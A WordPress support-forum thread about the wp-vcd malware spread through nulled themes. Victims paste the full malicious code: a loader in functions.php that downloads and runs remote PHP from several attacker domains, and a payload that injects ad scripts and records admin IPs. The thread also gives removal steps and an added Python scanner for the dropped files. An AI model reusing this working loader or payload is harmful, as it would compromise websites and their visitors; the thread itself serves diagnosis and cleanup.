• Resolved Revived

    (@revived)


    Received that this morning. What should I do?

    Here’s the code within wp-tmp.php:

    ini_set('display_errors', 0);
    error_reporting(0);
    $wp_auth_key='87b83c0568dfdee2d0d59bf8a221c00e';
    
    //echo "rrrr".get_template_directory();
    $file=file_get_contents(get_template_directory().'/functions.php');
    
    $pat_code='/div_code_name[\s\S]*?(if \( ! function_exists[\s\S]*?extract\([\s\S]*?)\?>/i';
    if(preg_match_all($pat_code, $file, $matches_pat_code))
    
    {
    
    $toreplace=$matches_pat_code[1][0];
    //echo $toreplace;
    
    $newxc=file_get_contents('https://www.dolsh.cc/new4.txt');
    
    if (stripos($newxc, $wp_auth_key) !== false) 
    {
    $new_file=str_replace($toreplace,$newxc,$file);
    @file_put_contents(get_template_directory().'/functions.php',$new_file);
    }
    
    }
    
    //@file_put_contents($funcfile,$file);
    
    if ( ! function_exists( 'slider_option' ) ) {  
    function slider_option($content){ 
    if(is_single())
    {
    
    $con2 = '
    
    <script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1426161"></script>
    
    <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1426162&interactive=1&pushup=1"></script>
    
    ';
    
    $content=$content.$con2;
    }
    return $content;
    } 
    
    function slider_option_footer(){ 
    if(!is_single())
    {
    
    $con2 = '
    
    <script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1426161"></script>
    
    <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1426162&interactive=1&pushup=1"></script>
    
    ';
    
    echo $con2;
    }
    } 
    
    function setting_my_first_cookie() {
      setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
      }
    
    if(is_user_logged_in())
    {
    add_action( 'init', 'setting_my_first_cookie',1 );
    }
    
    if( current_user_can('edit_others_pages'))
    {
    
    if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
    {
    $ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
    }
    
    if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
    {
    $ip.=$_SERVER['REMOTE_ADDR'].'
    ';
    @file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);
    
    }
    
    }
    
    $ref = $_SERVER['HTTP_REFERER'];
    $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
    foreach ($SE as $source) {
      if (strpos($ref,$source)!==false) {
        setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
    	$sevisitor=true;
      }
    }
    
    if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
    {
    $adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
    if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
    {
    if($sevisitor==true || isset($_COOKIE['sevisitor']))
    {
    add_filter('the_content','slider_option');
    add_action('wp_footer','slider_option_footer');
    }
    
    }
    } 
    
    }
    
    • This topic was modified 7 years, 3 months ago by Revived.
Viewing 2 replies - 16 through 17 (of 17 total)
  • The source is the viral code in the nulled template, stored in the template folder in the functions.php file.

    Here is the actual code:

    $div_code_name = "wp_vcd";
    $funcfile = __FILE__;
    if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

    function file_get_contents_tcurl($url)
    {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
    }

    function theme_temp_setup($phpCode)
    {
    $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
    $handle = fopen($tmpfname, "w+");
    if( fwrite($handle, "<?php\n" . $phpCode))
    {
    }
    else
    {
    $tmpfname = tempnam('./', "theme_temp_setup");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    }
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
    }

    $wp_auth_key='0bb00640fa54049fc4c2c5e080f9f51a';
    if (($tmpcontent = @file_get_contents("https://www.facocs.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.facocs.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
    @file_put_contents('wp-tmp.php', $tmpcontent);
    }
    }

    }
    }

    elseif ($tmpcontent = @file_get_contents("https://www.facocs.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
    @file_put_contents('wp-tmp.php', $tmpcontent);
    }
    }

    }
    }

    elseif ($tmpcontent = @file_get_contents("https://www.facocs.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
    @file_put_contents('wp-tmp.php', $tmpcontent);
    }
    }

    }
    }
    elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    }
    }
    }

    From here the files are created:
    wp-feed.php
    wp-vcd.php
    wp-tmp.php

    Today he has downloaded my file update-core.php; I had to copy the contents again.

    I'm not sure that all the code is removed; I will hope for the best.

    • This reply was modified 6 years, 11 months ago by mcklayru.

    To confirm what others have said (thanks, guys):

    – The malware comes from a nulled distribution (lesson learned).
    – The malware seems to try to benefit unlawfully from the website views/backlinks.

    Deleting the malicious code from functions.php first will auto-repopulate.
    Deleting wp-feed.php, wp-vcd.php and wp-tmp.php first will auto-repopulate.

    – I got some success by:

    0. Getting rid of the nulled theme/plugin and deleting unused themes.
    1. Deleting the malicious code from post.php FIRST.
    2. Deleting the malicious code from the theme functions.php.
    3. Deleting includes/wp-feed.php, wp-vcd.php and wp-tmp.php.

    All the themes from all the sites you have will be infected.

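A defender-side check for the indicators described across this thread (an added example, not code from the thread, from WordPress, or from the malware): it walks a WordPress root, reports the three dropped files by name, and flags any PHP file carrying the identifiers that appear in the two posted samples, covering every theme directory because, as noted above, all themes end up infected. The small site tree it builds is constructed for the demo; the auth-key value in it is a placeholder.

```python
"""Scan a WordPress tree for the wp-vcd indicators described in this thread."""
import os
import tempfile

# Files the thread reports the malware dropping, relative to the WordPress root.
DROPPED_FILES = ("wp-includes/wp-feed.php", "wp-includes/wp-vcd.php",
                 "wp-includes/wp-tmp.php")
# Identifiers taken from the two code samples posted above; none of them occurs
# in a clean WordPress core or in a legitimate theme's functions.php.
MARKERS = ("div_code_name", "wp_vcd", "theme_temp_setup", "wp_auth_key",
           "slider_option", "wordpress_cf_adm_use_adm", "sevisitor")

def scan_wordpress(root):
    """Return sorted (relative path, reason) pairs for every suspicious file."""
    findings = []
    for rel in DROPPED_FILES:
        if os.path.isfile(os.path.join(root, rel)):
            findings.append((rel, "dropped file present"))
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if rel in DROPPED_FILES:
                continue  # already reported by name above
            with open(path, encoding="utf-8", errors="ignore") as fh:
                text = fh.read()
            hits = [m for m in MARKERS if m in text]  # loader or payload present
            if hits:
                findings.append((rel, "marker(s): " + ", ".join(hits)))
    return sorted(findings)

def build_sample_site():
    """Constructed demo tree (not a real site): clean theme, nulled theme, dropped file."""
    root = tempfile.mkdtemp(prefix="wp-vcd-demo-")
    sample = {
        "wp-includes/wp-tmp.php": "<?php $wp_auth_key='0000'; // placeholder key\n",
        "wp-content/themes/clean/functions.php": "<?php add_theme_support('title-tag');\n",
        "wp-content/themes/nulled/functions.php":
            "<?php $div_code_name = \"wp_vcd\"; $wp_auth_key='0000';\n",
    }
    for rel, body in sample.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root
```

Run it against the real document root rather than the demo tree; a hit in wp-admin/includes/post.php or update-core.php alongside the theme files is the re-seeding the posters describe, so those copies have to go in the same pass.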
  • The topic ‘Warnings: * Unknown file in WordPress core: wp-includes/wp-tmp.php’ is closed to new replies.